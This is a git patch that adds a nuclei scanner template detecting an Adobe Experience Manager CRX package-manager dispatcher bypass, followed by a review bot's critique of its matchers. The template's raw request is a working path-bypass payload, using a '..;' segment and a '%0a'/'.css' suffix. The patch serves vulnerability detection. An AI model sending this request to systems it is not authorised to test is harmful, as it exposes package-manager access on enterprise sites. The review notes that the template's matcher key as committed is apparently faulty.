From 91b673ad17f460e9a87dc6efa5c0377116c5e472 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 28 Jun 2021 20:20:58 +0530
Subject: [PATCH] Create aem-crx-bypass.yaml

---
 misconfiguration/aem/aem-crx-bypass.yaml | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 misconfiguration/aem/aem-crx-bypass.yaml

diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml
new file mode 100644
index 0000000000..67ab69b627
--- /dev/null
+++ b/misconfiguration/aem/aem-crx-bypass.yaml
@@ -0,0 +1,22 @@
+id: aem-crx-bypass
+
+info:
+  author: dhiyaneshDK
+  name: AEM CRX Bypass
+  severity: critical
+  reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
+  tags: aem
+
+requests:
+  - raw:
+      - |
+        GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+        Referer: {{BaseURL}}
+        Connection: close
+        Accept-Encoding: gzip, deflate
+    matchers:
+      - type: word
+        word:
+          - "results:"
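Review bot: The matcher at the end of the hunk is a single body word match on `results:` with no status-code or part restriction, so any response whose body happens to contain that string (an error page, a search page, a WAF block page echoing the query) raises a critical finding; pair it with a `status: 200` matcher under `matchers-condition: and` and pin `part: body`. The key on the last line is `word:` whereas nuclei's word matcher reads `words:`, so as committed the template presumably either fails to load or never matches — run `nuclei -validate -t misconfiguration/aem/aem-crx-bypass.yaml` before merging. The request only reads `list.jsp` through the `/content/..;/` prefix and `;%0a….css` suffix, which confirms the dispatcher exposure without touching packages, but nothing in the file says why the path looks that way; a comment above the raw block such as `# dispatcher bypass: "..;" segment plus ";%0a…" and ".css" suffix must stay byte-for-byte (see reference)` would stop a later cleanup from "fixing" it.
```yaml
# … unchanged: id, info, raw request …
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "results:"
      - type: status
        status:
          - 200
```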